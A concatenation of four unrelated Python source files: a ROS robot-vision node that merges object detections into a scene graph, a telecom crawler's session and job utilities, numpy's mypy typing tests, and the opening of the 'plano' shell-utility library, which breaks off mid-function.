"col":(results["class_ids"][i][1][j],results["scores"][i][1][j]),
"sha":(results["class_ids"][i][2][j],results["scores"][i][2][j]),
"mat":(results["class_ids"][i][3][j],results["scores"][i][3][j]),
"opn":(results["class_ids"][i][4][j],results["scores"][i][4][j]),
"poses":results["poses"][i][j],
"boxes":results["boxes"][i][j],
"masks":results["masks"][i][:, :, j],
"source":i,
"position":j
}
)
clusters=[]
listOfclusters=[]
#cluster the set of objects
while listOfObjects!=[]:
cluster=listOfObjects[0]
del clusters[:]
for elem in listOfObjects:
distance= self.IOU(cluster["boxes"],elem["boxes"])
rospy.loginfo(str(cluster["boxes"])+" "+str(elem["boxes"])+" distance:"+str(distance))
if (distance >= self.config.CLUSTER_RADIUS and cluster["cat"][0]!=elem["cat"][0]) or (distance >= self.config.CLUSTER_RADIUS1 and cluster["cat"][0]==elem["cat"][0]):
mapObjectTocluster[elem["source"]][elem["position"]]=len(listOfclusters)
clusters.append(elem)
for elem in clusters:
listOfObjects.remove(elem)
listOfclusters.append(clusters[:])
#merging clusters into objects
del listOfObjects[:]
for cluster in listOfclusters:
catVal=map((lambda x: x["cat"][0]),cluster)
catProb=map((lambda x: x["cat"][1]),cluster)
argmaxCat=catVal[np.argmax(catProb)]
colorList=np.concatenate(map((lambda x: filter((lambda y: DatasetClasses.CVTCOLOR[1][x["source"]][y]==class_names[1][x["col"][0]]), DatasetClasses.CVTCOLOR[1][x["source"]].keys())),cluster))
colVal=map((lambda x: x["col"][0]),cluster)
colProb=map((lambda x: x["col"][1]),cluster)
if list(colorList)!=[]:
argmaxCol=max(set(list(colorList)),key=list(colorList).count)
else:
argmaxCol=class_names[1][colVal[np.argmax(colProb)]]
shaVal=map((lambda x: x["sha"][0]),cluster)
shaProb=map((lambda x: x["sha"][1]),cluster)
argmaxSha=shaVal[np.argmax(shaProb)]
matVal=map((lambda x: x["mat"][0]),cluster)
matProb=map((lambda x: x["mat"][1]),cluster)
argmaxMat=matVal[np.argmax(matProb)]
opnVal=map((lambda x: x["opn"][0]),cluster)
opnProb=map((lambda x: x["opn"][1]),cluster)
argmaxOpn=opnVal[np.argmax(opnProb)]
poseVal=map((lambda x: x["poses"]),cluster)
poseVal=sum(poseVal)/len(poseVal)
boxVal=map((lambda x: x["boxes"]),cluster)
boxVal=sum(boxVal)*1.0/len(boxVal)
maskVal=map((lambda x: x["masks"]),cluster)
maskVal=np.array(np.ceil(sum(maskVal)*1.0/len(boxVal)),dtype="uint8")
listOfObjects.append({ "cat":(class_names[0][argmaxCat],np.max(catProb)),
"col":(argmaxCol,np.max(colProb)),
"sha":(class_names[2][argmaxSha],np.max(shaProb)),
"mat":(class_names[3][argmaxMat],np.max(matProb)),
"opn":(class_names[4][argmaxOpn],np.max(opnProb)),
"poses":(poseVal,1.),
"boxes":(boxVal,1.),
"masks":(maskVal,1.),
"source":(mainSource,1.)
}
)
rospy.loginfo("Return merged objects: "+str(len(listOfObjects))+" objects")
#spatial relationship resolution
spatialRelations=(np.array([["BG"]*len(listOfObjects) for i in range(len(listOfObjects))],dtype="|S5"),np.ones([len(listOfObjects),len(listOfObjects)],dtype="float"))
for i in range(len(results["class_ids"])):
for j in range(results["poses"][i].shape[0]):
for k in range(results["poses"][i].shape[0]):
spatialRelations[0][mapObjectTocluster[i][j]][mapObjectTocluster[i][k]]=class_names[5][results["class_ids"][i][5][j][k]]
spatialRelations[1][mapObjectTocluster[i][j]][mapObjectTocluster[i][k]]=results["scores"][i][5][j][k]
del listOfclusters[:]
return listOfObjects,spatialRelations
################################################################################################
def syncImageProcessing(self,request):
try:
image = self.bridge.imgmsg_to_cv2(request.query, self.cvMode)
b=image[:,:,0].copy()
image[:,:,0]=image[:,:,2].copy()
image[:,:,2]=b.copy()
image = self.resize([image],self.iwidth,self.iheight)[0]
cv2.imwrite(self.TempImageFile1,image)
rospy.loginfo('Buffering of current image successful')
image = utils.load_image(self.TempImageFile1,None,self.config.MAX_CAMERA_CENTER_TO_PIXEL_DISTANCE)
dst=self.train_set
#predict
rospy.logwarn(image.shape)
R=image[:,:,0].copy()
G=image[:,:,1].copy()
B=image[:,:,2].copy()
image0=np.stack((R.copy()*0,G.copy(),B.copy(),image[:,:,3].copy(),image[:,:,4].copy(),image[:,:,5].copy(),image[:,:,6]),axis=2)#image0=np.flip(image,0)
image1=np.stack((R.copy(),B.copy(),G.copy(),image[:,:,3].copy(),image[:,:,4].copy(),image[:,:,5].copy(),image[:,:,6]),axis=2)#image1=np.flip(image,1)
image2=np.stack((B.copy(),G.copy(),R.copy(),image[:,:,3].copy(),image[:,:,4].copy(),image[:,:,5].copy(),image[:,:,6]),axis=2)#image2=np.flip(image1,0)
image3=np.stack((B.copy(),R.copy(),G.copy(),image[:,:,3].copy(),image[:,:,4].copy(),image[:,:,5].copy(),image[:,:,6]),axis=2)#image3=np.flip(image0,1)
image4=np.stack((G.copy(),R.copy(),B.copy(),image[:,:,3].copy(),image[:,:,4].copy(),image[:,:,5].copy(),image[:,:,6]),axis=2)#image4=self.resize([np.rot90(image,1)],self.iwidth,self.iheight)[0]
image5=np.stack((G.copy(),B.copy(),R.copy(),image[:,:,3].copy(),image[:,:,4].copy(),image[:,:,5].copy(),image[:,:,6]),axis=2)#image5=self.resize([np.rot90(image,3)],self.iwidth,self.iheight)[0]
image6=np.stack((R.copy(),G.copy()*0,B.copy(),image[:,:,3].copy(),image[:,:,4].copy(),image[:,:,5].copy(),image[:,:,6]),axis=2)#image6=image-30
image7=np.stack((R.copy(),G.copy(),B.copy()*0,image[:,:,3].copy(),image[:,:,4].copy(),image[:,:,5].copy(),image[:,:,6]),axis=2)#image7=image+30
#images=[image0.copy(),image1.copy(),image2.copy(),image3.copy(),image.copy(),image4.copy(),image5.copy(),image6.copy(),image7.copy()]
images=[image.copy()]
rImages=[]
main_ax=get_ax(cols=2)
main_mask=[]
main_back=[]
list_results=[]
merge_results={"class_ids":[],"scores":[],"boxes":[],"poses":[],"masks":[]}
while self.mutex4.testandset():
pass
for image in images:
results = self.model.detect([image], verbose=0)
list_results.append(results)
r=results[0]
class_ids=[r['class_cat_ids'],r['class_col_ids'],r['class_sha_ids'],r['class_mat_ids'],r['class_opn_ids'],r['class_rel_ids']]
scores=[r['scores_cat'],r['scores_col'],r['scores_sha'],r['scores_mat'],r['scores_opn'],r['scores_rel']]
merge_results["class_ids"].append(class_ids)
merge_results["scores"].append(scores)
merge_results["boxes"].append(r['rois'])
merge_results["poses"].append(r['poses'])
merge_results["masks"].append(r['masks'])
self.mutex4.unlock()
rospy.loginfo("****************************** BEGIN MERGING **************************************************")
listOfObjects,spatialRelations=self.merge_results_fct(merge_results,dst.class_names)
print(listOfObjects,spatialRelations)
rospy.loginfo("****************************** END MERGING **************************************************")
scenegraph=visualize.display_instances_v3(images[0][:,:,:3], listOfObjects, spatialRelations,main_ax,score=True,title="",title1='',
figsize=(16, 16),result_path=self.result_path+'/'+self.TempImageFile1)
rospy.loginfo('Inference terminated!!!')
return scenegraph
except Exception as e:
rospy.logwarn(' Failed to buffer image '+str(e))
return GetSceneGraphResponse()
###################################################################################################
if __name__=="__main__":
try:
#start the model loader
tkm=TaskManager()
#Infinite Loop
#rospy.spin()
while not rospy.is_shutdown():
tkm.showImages()
except Exception as e:
rospy.logwarn('Shutting down RobotVQA node ...'+str(e))
| |
# -*- coding:utf-8 -*-
import os
import re
import time
import codecs
import traceback
from mrq.job import queue_job, get_job_result, Job
import setting.api_config as config
from setting.status_code import STATUS_CODE
from com.connection import db
from com.redis_conn import redis_instance
def get_tel_info(tel_prefix):
data = redis_instance.get(tel_prefix)
if data:
data_list = data.split(',')
return {'telecom': data_list[0], 'province': data_list[1], 'city': data_list[2]}
return {}
def tel_loc_info(tel):
try:
# check the tel which location it belongs
tel_prefix = tel[:7]
tel_info = get_tel_info(tel_prefix)
if not tel_info:
return {}
telecom = tel_info['telecom'].decode('utf8')
tel_info.update(config.TELECOM_FLOW_INFO[telecom])
return tel_info
except:
# handle any uncertain exception
return {}
def pass_crawler_params(sid, action, params):
update_data = {'sid': sid, 'action': action, 'receive': False,
'parameters': params}
ret = db['params'].update_one({'sid':sid}, {'$set':update_data}, upsert=True)
return ret
def init_sid_info():
try:
db['sid_info'].create_index(('sid'), unique=True)
except:
print traceback.format_exc()
return False
return True
def get_sid_info(sid):
ret = db['sid_info'].find_one({'sid':sid})
if not ret:
return {}
# timestamp - expire_time to see if it is expired
timestamp = int(time.mktime(time.localtime()))
expire_time = ret['expire_time']
if timestamp > expire_time:
# expired
ret['is_expired'] = True
else:
# not expired, and update the new expire time
ret['is_expired'] = False
update_data = {'expire_time': timestamp + config.SID_EXPIRE_TIME}
db['sid_info'].update_one({'sid':sid}, {'$set':update_data})
return ret
def set_sid_info(sid, tel, tel_info):
timestamp = int(time.mktime(time.localtime()))
insert_data = {
'sid': sid,
'tel': tel,
'start_time': timestamp,
'status': 1,
'message': 'start to crawl',
'end_time': timestamp,
'expire_time': timestamp + config.SID_EXPIRE_TIME
}
insert_data.update(tel_info)
try:
db['sid_info'].insert_one(insert_data)
except:
print traceback.format_exc()
return False
return True
def undo_sid_info(sid,tel):
try:
ret=db['sid_info'].find_one({'sid':sid,'tel':tel})
if ret:
# print ret
#checkout state
# job_id = ret.get('job_id', "")
# try:
# jobs = Job(job_id)
# jobs.cancel()
# except:
# print traceback.format_exc()
ret=db['sid_info'].remove({'sid':sid,'tel':tel})
ret = db['state'].find_one({'sid': sid})
if ret:
# print ret
ret=db['state'].remove({'sid':sid})
ret=db['params'].find_one({'sid':sid})
if ret:
# print ret
ret=db['params'].remove({'sid':sid})
#init state
return True
return False
except:
print traceback.format_exc()
return False
def send_crawl_task(sid, tel, flow_type, province, city, timeout=5, sleep_time=1):
alive = check_crawler_alive(sid)
if alive:
return False
else:
# send job queue to start crawler
params = {
'sid': sid,
'tel': tel,
'flow_type': flow_type,
'province': province,
'city': city
}
job_id = queue_job(config.TASK_PATH, params, queue=config.QUEUE_NAME)
if len(str(job_id))>11:
db['sid_info'].update_one(
{'sid': sid}, {'$set': {'job_id':job_id}}, upsert=True)
return True
else:
return False
# db communicate util
# def check_sid_used(sid, tel):
# mongo_config = _DB_CONFIG['sid']
# client = pymongo.MongoClient(mongo_config['host'], mongo_config['port'])
# c = client[mongo_config['db']][mongo_config['collection']]
# ret = c.find_one({'sid': sid})
# if ret or ret.get('tel', '') != tel:
# return False
# return True
def check_crawler_alive(sid):
ret = db['state'].find_one({'sid': sid})
if not ret:
return False
return True
def check_login_state(sid, timeout=config.STATE_TIME_OUT, sleep_time=config.STEP_TIME):
max_retry = int(timeout/sleep_time)
retry = 0
while(retry < max_retry):
retry += 1
ret = db['state'].find_one({'sid':sid})
if not ret:
time.sleep(sleep_time)
elif ret['state'] == 'Crawl':
return True, ret
elif ret['state'] == 'Wait Code Request':
return True, ret
elif 'Failed' in ret['state']:
return False, ret
else:
time.sleep(sleep_time)
return False, {}
#def check_crawler_state(sid, states, timeout=5, sleep_time=0.5):
def check_crawler_state(sid, timeout=config.STATE_TIME_OUT, sleep_time=config.STEP_TIME):
max_retry = int(timeout/sleep_time)
retry = 0
ret = {}
while(retry < max_retry):
time.sleep(sleep_time)
retry += 1
#ret = c.find_one({'sid':sid, 'state': {'$in': states}})
ret = db['state'].find_one({'sid':sid, 'receive': False})
if ret:
update_data = {'receive': True}
db['state'].update_one({'sid':sid}, {'$set':update_data}, upsert=True)
return True, ret
ret = {
'sid': sid,
'info': {
'next_action': 'Reset',
'status': STATUS_CODE['timeout']['status'],
'message': STATUS_CODE['timeout']['message']
}
}
# api_log
return False, ret
def check_sid_info_error(sid_info):
timestamp = int(time.mktime(time.localtime()))
if not sid_info:
error = STATUS_CODE['invalid_sid']
elif sid_info['expire_time'] < timestamp:
error = STATUS_CODE['outdated_sid']
elif sid_info['status'] != 1:
error = STATUS_CODE['duplicate_sid']
else:
return {}
error['next_action'] = 'Reset'
return error
| |
import importlib.util
import itertools
import os
import re
import shutil
from collections import defaultdict
from typing import Optional, IO, Dict, List
import pytest
import numpy as np
from numpy.typing.mypy_plugin import _PRECISION_DICT, _EXTENDED_PRECISION_LIST
try:
from mypy import api
except ImportError:
NO_MYPY = True
else:
NO_MYPY = False
DATA_DIR = os.path.join(os.path.dirname(__file__), "data")
PASS_DIR = os.path.join(DATA_DIR, "pass")
FAIL_DIR = os.path.join(DATA_DIR, "fail")
REVEAL_DIR = os.path.join(DATA_DIR, "reveal")
MISC_DIR = os.path.join(DATA_DIR, "misc")
MYPY_INI = os.path.join(DATA_DIR, "mypy.ini")
CACHE_DIR = os.path.join(DATA_DIR, ".mypy_cache")
#: A dictionary with file names as keys and lists of the mypy stdout as values.
#: To-be populated by `run_mypy`.
OUTPUT_MYPY: Dict[str, List[str]] = {}
def _key_func(key: str) -> str:
"""Split at the first occurance of the ``:`` character.
Windows drive-letters (*e.g.* ``C:``) are ignored herein.
"""
drive, tail = os.path.splitdrive(key)
return os.path.join(drive, tail.split(":", 1)[0])
@pytest.mark.slow
@pytest.mark.skipif(NO_MYPY, reason="Mypy is not installed")
@pytest.fixture(scope="module", autouse=True)
def run_mypy() -> None:
"""Clears the cache and run mypy before running any of the typing tests.
The mypy results are cached in `OUTPUT_MYPY` for further use.
"""
if os.path.isdir(CACHE_DIR):
shutil.rmtree(CACHE_DIR)
for directory in (PASS_DIR, REVEAL_DIR, FAIL_DIR, MISC_DIR):
# Run mypy
stdout, stderr, _ = api.run([
"--config-file",
MYPY_INI,
"--cache-dir",
CACHE_DIR,
directory,
])
assert not stderr, directory
stdout = stdout.replace('*', '')
# Parse the output
iterator = itertools.groupby(stdout.split("\n"), key=_key_func)
OUTPUT_MYPY.update((k, list(v)) for k, v in iterator if k)
def get_test_cases(directory):
for root, _, files in os.walk(directory):
for fname in files:
if os.path.splitext(fname)[-1] == ".py":
fullpath = os.path.join(root, fname)
# Use relative path for nice py.test name
relpath = os.path.relpath(fullpath, start=directory)
yield pytest.param(
fullpath,
# Manually specify a name for the test
id=relpath,
)
@pytest.mark.slow
@pytest.mark.skipif(NO_MYPY, reason="Mypy is not installed")
@pytest.mark.parametrize("path", get_test_cases(PASS_DIR))
def test_success(path):
# Alias `OUTPUT_MYPY` so that it appears in the local namespace
output_mypy = OUTPUT_MYPY
if path in output_mypy:
raise AssertionError("\n".join(v for v in output_mypy[path].values()))
@pytest.mark.slow
@pytest.mark.skipif(NO_MYPY, reason="Mypy is not installed")
@pytest.mark.parametrize("path", get_test_cases(FAIL_DIR))
def test_fail(path):
__tracebackhide__ = True
with open(path) as fin:
lines = fin.readlines()
errors = defaultdict(lambda: "")
output_mypy = OUTPUT_MYPY
assert path in output_mypy
for error_line in output_mypy[path]:
match = re.match(
r"^.+\.py:(?P<lineno>\d+): (error|note): .+$",
error_line,
)
if match is None:
raise ValueError(f"Unexpected error line format: {error_line}")
lineno = int(match.group('lineno'))
errors[lineno] += error_line
for i, line in enumerate(lines):
lineno = i + 1
if line.startswith('#') or (" E:" not in line and lineno not in errors):
continue
target_line = lines[lineno - 1]
if "# E:" in target_line:
marker = target_line.split("# E:")[-1].strip()
expected_error = errors.get(lineno)
_test_fail(path, marker, expected_error, lineno)
else:
pytest.fail(f"Error {repr(errors[lineno])} not found")
_FAIL_MSG1 = """Extra error at line {}
Extra error: {!r}
"""
_FAIL_MSG2 = """Error mismatch at line {}
Expected error: {!r}
Observed error: {!r}
"""
def _test_fail(path: str, error: str, expected_error: Optional[str], lineno: int) -> None:
if expected_error is None:
raise AssertionError(_FAIL_MSG1.format(lineno, error))
elif error not in expected_error:
raise AssertionError(_FAIL_MSG2.format(lineno, expected_error, error))
def _construct_format_dict():
dct = {k.split(".")[-1]: v.replace("numpy", "numpy.typing") for
k, v in _PRECISION_DICT.items()}
return {
"uint8": "numpy.unsignedinteger[numpy.typing._8Bit]",
"uint16": "numpy.unsignedinteger[numpy.typing._16Bit]",
"uint32": "numpy.unsignedinteger[numpy.typing._32Bit]",
"uint64": "numpy.unsignedinteger[numpy.typing._64Bit]",
"uint128": "numpy.unsignedinteger[numpy.typing._128Bit]",
"uint256": "numpy.unsignedinteger[numpy.typing._256Bit]",
"int8": "numpy.signedinteger[numpy.typing._8Bit]",
"int16": "numpy.signedinteger[numpy.typing._16Bit]",
"int32": "numpy.signedinteger[numpy.typing._32Bit]",
"int64": "numpy.signedinteger[numpy.typing._64Bit]",
"int128": "numpy.signedinteger[numpy.typing._128Bit]",
"int256": "numpy.signedinteger[numpy.typing._256Bit]",
"float16": "numpy.floating[numpy.typing._16Bit]",
"float32": "numpy.floating[numpy.typing._32Bit]",
"float64": "numpy.floating[numpy.typing._64Bit]",
"float80": "numpy.floating[numpy.typing._80Bit]",
"float96": "numpy.floating[numpy.typing._96Bit]",
"float128": "numpy.floating[numpy.typing._128Bit]",
"float256": "numpy.floating[numpy.typing._256Bit]",
"complex64": "numpy.complexfloating[numpy.typing._32Bit, numpy.typing._32Bit]",
"complex128": "numpy.complexfloating[numpy.typing._64Bit, numpy.typing._64Bit]",
"complex160": "numpy.complexfloating[numpy.typing._80Bit, numpy.typing._80Bit]",
"complex192": "numpy.complexfloating[numpy.typing._96Bit, numpy.typing._96Bit]",
"complex256": "numpy.complexfloating[numpy.typing._128Bit, numpy.typing._128Bit]",
"complex512": "numpy.complexfloating[numpy.typing._256Bit, numpy.typing._256Bit]",
"ubyte": f"numpy.unsignedinteger[{dct['_NBitByte']}]",
"ushort": f"numpy.unsignedinteger[{dct['_NBitShort']}]",
"uintc": f"numpy.unsignedinteger[{dct['_NBitIntC']}]",
"uintp": f"numpy.unsignedinteger[{dct['_NBitIntP']}]",
"uint": f"numpy.unsignedinteger[{dct['_NBitInt']}]",
"ulonglong": f"numpy.unsignedinteger[{dct['_NBitLongLong']}]",
"byte": f"numpy.signedinteger[{dct['_NBitByte']}]",
"short": f"numpy.signedinteger[{dct['_NBitShort']}]",
"intc": f"numpy.signedinteger[{dct['_NBitIntC']}]",
"intp": f"numpy.signedinteger[{dct['_NBitIntP']}]",
"int_": f"numpy.signedinteger[{dct['_NBitInt']}]",
"longlong": f"numpy.signedinteger[{dct['_NBitLongLong']}]",
"half": f"numpy.floating[{dct['_NBitHalf']}]",
"single": f"numpy.floating[{dct['_NBitSingle']}]",
"double": f"numpy.floating[{dct['_NBitDouble']}]",
"longdouble": f"numpy.floating[{dct['_NBitLongDouble']}]",
"csingle": f"numpy.complexfloating[{dct['_NBitSingle']}, {dct['_NBitSingle']}]",
"cdouble": f"numpy.complexfloating[{dct['_NBitDouble']}, {dct['_NBitDouble']}]",
"clongdouble": f"numpy.complexfloating[{dct['_NBitLongDouble']}, {dct['_NBitLongDouble']}]",
# numpy.typing
"_NBitInt": dct['_NBitInt'],
}
#: A dictionary with all supported format keys (as keys)
#: and matching values
FORMAT_DICT: Dict[str, str] = _construct_format_dict()
def _parse_reveals(file: IO[str]) -> List[str]:
"""Extract and parse all ``" # E: "`` comments from the passed file-like object.
All format keys will be substituted for their respective value from `FORMAT_DICT`,
*e.g.* ``"{float64}"`` becomes ``"numpy.floating[numpy.typing._64Bit]"``.
"""
string = file.read().replace("*", "")
# Grab all `# E:`-based comments
comments_array = np.char.partition(string.split("\n"), sep=" # E: ")[:, 2]
comments = "/n".join(comments_array)
# Only search for the `{*}` pattern within comments,
# otherwise there is the risk of accidently grabbing dictionaries and sets
key_set = set(re.findall(r"\{(.*?)\}", comments))
kwargs = {
k: FORMAT_DICT.get(k, f"<UNRECOGNIZED FORMAT KEY {k!r}>") for k in key_set
}
fmt_str = comments.format(**kwargs)
return fmt_str.split("/n")
@pytest.mark.slow
@pytest.mark.skipif(NO_MYPY, reason="Mypy is not installed")
@pytest.mark.parametrize("path", get_test_cases(REVEAL_DIR))
def test_reveal(path):
__tracebackhide__ = True
with open(path) as fin:
lines = _parse_reveals(fin)
output_mypy = OUTPUT_MYPY
assert path in output_mypy
for error_line in output_mypy[path]:
match = re.match(
r"^.+\.py:(?P<lineno>\d+): note: .+$",
error_line,
)
if match is None:
raise ValueError(f"Unexpected reveal line format: {error_line}")
lineno = int(match.group('lineno')) - 1
assert "Revealed type is" in error_line
marker = lines[lineno]
_test_reveal(path, marker, error_line, 1 + lineno)
_REVEAL_MSG = """Reveal mismatch at line {}
Expected reveal: {!r}
Observed reveal: {!r}
"""
def _test_reveal(path: str, reveal: str, expected_reveal: str, lineno: int) -> None:
if reveal not in expected_reveal:
raise AssertionError(_REVEAL_MSG.format(lineno, expected_reveal, reveal))
@pytest.mark.slow
@pytest.mark.skipif(NO_MYPY, reason="Mypy is not installed")
@pytest.mark.parametrize("path", get_test_cases(PASS_DIR))
def test_code_runs(path):
path_without_extension, _ = os.path.splitext(path)
dirname, filename = path.split(os.sep)[-2:]
spec = importlib.util.spec_from_file_location(f"{dirname}.{filename}", path)
test_module = importlib.util.module_from_spec(spec)
spec.loader.exec_module(test_module)
LINENO_MAPPING = {
3: "uint128",
4: "uint256",
6: "int128",
7: "int256",
9: "float80",
10: "float96",
11: "float128",
12: "float256",
14: "complex160",
15: "complex192",
16: "complex256",
17: "complex512",
}
@pytest.mark.slow
@pytest.mark.skipif(NO_MYPY, reason="Mypy is not installed")
def test_extended_precision() -> None:
path = os.path.join(MISC_DIR, "extended_precision.py")
output_mypy = OUTPUT_MYPY
assert path in output_mypy
for _msg in output_mypy[path]:
*_, _lineno, msg_typ, msg = _msg.split(":")
lineno = int(_lineno)
msg_typ = msg_typ.strip()
assert msg_typ in {"error", "note"}
if LINENO_MAPPING[lineno] in _EXTENDED_PRECISION_LIST:
if msg_typ == "error":
raise ValueError(f"Unexpected reveal line format: {lineno}")
else:
marker = FORMAT_DICT[LINENO_MAPPING[lineno]]
_test_reveal(path, marker, msg, lineno)
else:
if msg_typ == "error":
marker = "Module has no attribute"
_test_fail(path, marker, msg, lineno)
| |
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
from __future__ import print_function
import atexit as _atexit
import binascii as _binascii
import codecs as _codecs
import collections as _collections
import fnmatch as _fnmatch
import getpass as _getpass
import os as _os
import random as _random
import re as _re
import shlex as _shlex
import shutil as _shutil
import signal as _signal
import subprocess as _subprocess
import sys as _sys
import tarfile as _tarfile
import tempfile as _tempfile
import time as _time
import traceback as _traceback
import types as _types
import uuid as _uuid
from subprocess import CalledProcessError
# See documentation at http://www.ssorj.net/projects/plano.html
_message_levels = (
"debug",
"notice",
"warn",
"error",
)
_debug = _message_levels.index("debug")
_notice = _message_levels.index("notice")
_warn = _message_levels.index("warn")
_error = _message_levels.index("error")
_message_output = _sys.stderr
_message_threshold = _notice
def set_message_output(writeable):
global _message_output
_message_output = writeable
def set_message_threshold(level):
assert level in _message_levels
global _message_threshold
_message_threshold = _message_levels.index(level)
def fail(message, *args):
error(message, *args)
if isinstance(message, BaseException):
raise message
raise Exception(message)
def error(message, *args):
_print_message("Error", message, args)
def warn(message, *args):
if _message_threshold <= _warn:
_print_message("Warn", message, args)
def notice(message, *args):
if _message_threshold <= _notice:
_print_message(None, message, args)
def debug(message, *args):
if _message_threshold <= _debug:
_print_message("Debug", message, args)
def exit(arg=None, *args):
if arg in (0, None):
_sys.exit()
if _is_string(arg):
error(arg, args)
_sys.exit(1)
elif isinstance(arg, _types.IntType):
error("Exiting with code {0}", arg)
_sys.exit(arg)
else:
raise Exception()
def _print_message(category, message, args):
if _message_output is None:
return
message = _format_message(category, message, args)
print(message, file=_message_output)
_message_output.flush()
def _format_message(category, message, args):
if not _is_string(message):
message = str(message)
if args:
message = message.format(*args)
if len(message) > 0 and message[0].islower():
message = message[0].upper() + message[1:]
if category:
message = "{0}: {1}".format(category, message)
program = program_name()
message = "{0}: {1}".format(program, message)
return message
def flush():
_sys.stdout.flush()
_sys.stderr.flush()
absolute_path = _os.path.abspath
normalize_path = _os.path.normpath
exists = _os.path.exists
is_absolute = _os.path.isabs
is_dir = _os.path.isdir
is_file = _os.path.isfile
is_link = _os.path.islink
join = _os.path.join
split = _os.path.split
split_extension = _os.path.splitext
current_dir = _os.getcwd
sleep = _time.sleep
LINE_SEP = _os.linesep
PATH_SEP = _os.sep
PATH_VAR_SEP = _os.pathsep
ENV = _os.environ
ARGS = _sys.argv
def home_dir(user=""):
return _os.path.expanduser("~{0}".format(user))
def parent_dir(path):
path = normalize_path(path)
parent, child = split(path)
return parent
def file_name(file):
file = normalize_path(file)
dir, name = split(file)
return name
def name_stem(file):
name = file_name(file)
if name.endswith(".tar.gz"):
name = name[:-3]
stem, ext = split_extension(name)
return stem
def name_extension(file):
name = file_name(file)
stem, ext = split_extension(name)
return ext
def program_name(command=None):
if command is None:
args = ARGS
else:
args = command.split()
for arg in args:
if "=" not in arg:
return file_name(arg)
def read(file):
with _codecs.open(file, encoding="utf-8", mode="r") as f:
return f.read()
def write(file, string):
with _codecs.open(file, encoding="utf-8", mode="w") as f:
f.write(string)
return file
def append(file, string):
with _codecs.open(file, encoding="utf-8", mode="a") as f:
f.write(string)
return file
def prepend(file, string):
orig = read(file)
prepended = string + orig
return write(file, prepended)
# XXX Should this work on directories?
def touch(file):
return append(file, "")
def tail(file, n):
return "".join(tail_lines(file, n))
def read_lines(file):
with _codecs.open(file, encoding="utf-8", mode="r") as f:
return f.readlines()
def write_lines(file, lines):
with _codecs.open(file, encoding="utf-8", mode="r") as f:
f.writelines(lines)
return file
def append_lines(file, lines):
with _codecs.open(file, encoding="utf-8", mode="a") as f:
f.writelines(string)
return file
def prepend_lines(file, lines):
orig_lines = read_lines(file)
with _codecs.open(file, encoding="utf-8", mode="w") as f:
f.writelines(lines)
f.writelines(orig_lines)
return file
# Derived from http://stackoverflow.com/questions/136168/get-last-n-lines-of-a-file-with-python-similar-to-tail
def tail_lines(file, n):
assert n >= 0
with _codecs.open(file, encoding="utf-8", mode="r") as f:
pos = n + 1
lines = list()
while len(lines) <= n:
try:
f.seek(-pos, 2)
except IOError:
f.seek(0)
break
finally:
lines = f.readlines()
pos *= 2
return lines[-n:]
_temp_dir = _tempfile.mkdtemp(prefix="plano-")
def _remove_temp_dir():
_shutil.rmtree(_temp_dir, ignore_errors=True)
_atexit.register(_remove_temp_dir)
# XXX Use _tempfile instead
def make_temp_file():
key = unique_id(4)
file = join(_temp_dir, "_file_{0}".format(key))
return append(file, "")
# This one is deleted on process exit
def make_temp_dir():
return _tempfile.mkdtemp(prefix="_dir_", dir=_temp_dir)
# This one sticks around
def make_user_temp_dir():
temp_dir = _tempfile.gettempdir()
user = _getpass.getuser()
user_temp_dir = join(temp_dir, user)
return make_dir(user_temp_dir)
def unique_id(length=16):
assert length >= 1
assert length <= 16
uuid_bytes = _uuid.uuid4().bytes
uuid_bytes = uuid_bytes[:length]
return _binascii.hexlify(uuid_bytes).decode("utf-8")
def copy(from_path, to_path):
notice("Copying '{0}' to '{1}'", from_path, to_path)
to_dir = parent_dir(to_path)
if to_dir:
make_dir(to_dir)
if is_dir(from_path):
_copytree(from_path, to_path, symlinks=True)
else:
_shutil.copy(from_path, to_path)
return to_path
def move(from_path, to_path):
notice("Moving '{0}' to '{1}'", from_path, to_path)
_shutil.move(from_path, to_path)
return to_path
def rename(path, expr, replacement):
path = normalize_path(path)
parent_dir, name = split(path)
to_name = string_replace(name, expr, replacement)
to_path = join(parent_dir, to_name)
notice("Renaming '{0}' to '{1}'", path, to_path)
move(path, to_path)
return to_path
def remove(path):
notice("Removing '{0}'", path)
if not exists(path):
return
if is_dir(path):
_shutil.rmtree(path, ignore_errors=True)
else:
_os.remove(path)
return path
def make_link(source_path, link_file):
if exists(link_file):
assert read_link(link_file) == source_path
return
_os.symlink(source_path, link_file)
return link_file
def read_link(file):
return _os.readlink(file)
def find(dir, *patterns):
matched_paths = set()
if not patterns:
patterns = ("*",)
for root, dirs, files in _os.walk(dir):
for pattern in patterns:
matched_dirs = _fnmatch.filter(dirs, pattern)
matched_files = _fnmatch.filter(files, pattern)
matched_paths.update([join(root, x) for x in matched_dirs])
matched_paths.update([join(root, x) for x in matched_files])
return sorted(matched_paths)
def find_any_one(dir, *patterns):
paths = find(dir, *patterns)
if len(paths) == 0:
return
return paths[0]
def find_only_one(dir, *patterns):
paths = find(dir, *patterns)
if len(paths) == 0:
return
assert len(paths) == 1
return paths[0]
# find_via_expr?
def string_replace(string, expr, replacement, count=0):
return _re.sub(expr, replacement, string, count)
def make_dir(dir):
if not exists(dir):
_os.makedirs(dir)
return dir
# Returns the current working directory so you can change it back
def change_dir(dir):
notice("Changing directory to '{0}'", dir)
cwd = current_dir()
_os.chdir(dir)
return cwd
def list_dir(dir, *patterns):
assert is_dir(dir)
names = _os.listdir(dir)
if not patterns:
return sorted(names)
matched_names = set()
for pattern in patterns:
matched_names.update(_fnmatch.filter(names, pattern))
return sorted(matched_names)
class working_dir(object):
def __init__(self, dir):
self.dir = dir
self.prev_dir = None
def __enter__(self):
self.prev_dir = change_dir(self.dir)
return self.dir
def __exit__(self, type, value, traceback):
change_dir(self.prev_dir)
def call(command, *args, **kwargs):
proc = start_process(command, *args, **kwargs)
wait_for_process(proc)
if proc.returncode != 0:
command_string = _command_string(command)
command_string = command_string.format(*args)
raise CalledProcessError(proc.returncode, command_string)
def call_for_exit_code(command, *args, **kwargs):
proc = start_process(command, *args, **kwargs)
wait_for_process(proc)
